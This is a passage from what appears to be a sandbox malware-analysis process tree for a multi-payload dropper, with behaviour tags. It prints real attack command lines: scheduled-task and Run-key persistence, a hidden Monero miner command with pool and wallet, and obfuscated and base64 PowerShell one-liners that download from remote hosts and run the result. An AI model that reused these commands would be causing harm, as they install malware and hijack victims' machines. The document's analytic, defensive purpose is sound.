      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4652
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:5484
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:1228
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6444
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:7340
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:4576
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:7464
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:7460
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4760
        
        C:\Users\Admin\AppData\Roaming\6810834.exe
        
        "C:\Users\Admin\AppData\Roaming\6810834.exe"
        8⤵
        Executes dropped EXE
        
        PID:5812
        
        C:\Users\Admin\AppData\Roaming\3470105.exe
        
        "C:\Users\Admin\AppData\Roaming\3470105.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:5892
        
        C:\Users\Admin\AppData\Roaming\6261924.exe
        
        "C:\Users\Admin\AppData\Roaming\6261924.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        
        PID:5264
        
        C:\Users\Admin\AppData\Roaming\7937391.exe
        
        "C:\Users\Admin\AppData\Roaming\7937391.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        
        PID:5328
        
        C:\Users\Admin\AppData\Roaming\5407667.exe
        
        "C:\Users\Admin\AppData\Roaming\5407667.exe"
        8⤵
        Executes dropped EXE
        
        PID:4516
        
        C:\Users\Admin\AppData\Roaming\3593047.exe
        
        "C:\Users\Admin\AppData\Roaming\3593047.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:6048
        
        C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4828
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Alfanewfile2.exe /f
        9⤵
        Kills process with taskkill
        
        PID:6172
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:6896
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4932
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4932 -s 1528
        8⤵
        Program crash
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:5028
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 804
        8⤵
        Program crash
        
        PID:4132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 816
        8⤵
        Program crash
        
        PID:3564
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 876
        8⤵
        Program crash
        
        PID:5296
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 636
        8⤵
        Program crash
        
        PID:5516
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 972
        8⤵
        Program crash
        
        PID:5684
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1356
        8⤵
        Program crash
        
        PID:4524
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1416
        8⤵
        Program crash
        
        PID:2892
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 1348
        8⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\is-I50HL.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I50HL.tmp\setup_2.tmp" /SL5="$300F4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\is-8OL9N.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8OL9N.tmp\setup_2.tmp" /SL5="$10288,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\is-QK2EA.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QK2EA.tmp\postback.exe" ss1
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5696
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        12⤵
        
        PID:4220
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        13⤵
        Executes dropped EXE
        
        PID:5272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        14⤵
        Blocklisted process makes network request
        
        PID:6044
        
        C:\Users\Admin\AppData\Local\Temp\BjwbyJzQn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BjwbyJzQn.exe"
        13⤵
        
        PID:6896
        
        C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
        14⤵
        Adds Run key to start application
        
        PID:7440
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        15⤵
        
        PID:7980
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        16⤵
        
        PID:8124
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F
        15⤵
        Creates scheduled task(s)
        
        PID:8056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\chromeupdate\chromeupdate.cmd" "
        15⤵
        
        PID:5576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA
        16⤵
        Blocklisted process makes network request
        
        PID:5432
        
        C:\Windows\SysWOW64\wscript.exe
        
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs
        17⤵
        
        PID:7692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\chromeupdate\chromeupdate.cmd" "
        15⤵
        
        PID:13144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA
        16⤵
        Blocklisted process makes network request
        
        PID:17296
        
        C:\Windows\SysWOW64\wscript.exe
        
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs
        17⤵
        
        PID:12488
        
        C:\Users\Admin\AppData\Local\Temp\209ez2G3c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\209ez2G3c.exe"
        13⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3956
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        
        PID:5180
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3944
    - - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue1109eec571ac.exe
        
        Tue1109eec571ac.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:4072
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 656
        6⤵
        Program crash
        
        PID:4768
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 672
        6⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4132
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 632
        6⤵
        Program crash
        
        PID:5288
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 672
        6⤵
        Program crash
        
        PID:5508
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 904
        6⤵
        Program crash
        
        PID:5148
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 936
        6⤵
        Program crash
        
        PID:572
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 1156
        6⤵
        Program crash
        
        PID:5780
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 1136
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:4724
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:632
    - - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11141271fbe5877f.exe
        
        Tue11141271fbe5877f.exe
        5⤵
        Executes dropped EXE
        
        PID:3956
      - C:\ProgramData\516335.exe
        
        "C:\ProgramData\516335.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4564
      - C:\ProgramData\2904185.exe
        
        "C:\ProgramData\2904185.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4700
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:5360
      - C:\ProgramData\1545390.exe
        
        "C:\ProgramData\1545390.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        
        PID:3160
      - C:\ProgramData\6883636.exe
        
        "C:\ProgramData\6883636.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        
        PID:504
      - C:\ProgramData\3787697.exe
        
        "C:\ProgramData\3787697.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4836
      - C:\ProgramData\2176669.exe
        
        "C:\ProgramData\2176669.exe"
        6⤵
        Executes dropped EXE
        
        PID:4780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue118f55232e4.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3016
    - - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue118f55232e4.exe
        
        Tue118f55232e4.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:2184
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:204
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:5372
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3168
    - - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue112c483dd3245d.exe
        
        Tue112c483dd3245d.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:3200
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Tue112c483dd3245d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue112c483dd3245d.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Tue112c483dd3245d.exe /f
        7⤵
        Kills process with taskkill
        
        PID:4792
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:6748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3448
    - - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        Tue11e4e580f2e8141a3.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1096
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4456
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4476
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5108
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:792
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5216
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5616
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5080
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5820
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5388
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5956
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 24
        7⤵
        Program crash
        
        PID:6100
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:1456
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4296
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:6528
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:6792
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5272
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6628
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7112
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4480
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6500
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6752
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4172
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7504
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6832
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6672
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7632
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4576
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5276
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6396
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5652
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1160
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4592
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7576
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2912
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7856
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1264
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4540
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7352
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7396
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8164
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2480
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6376
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1028
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1840
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2268
      - C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC5BD5284\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7756
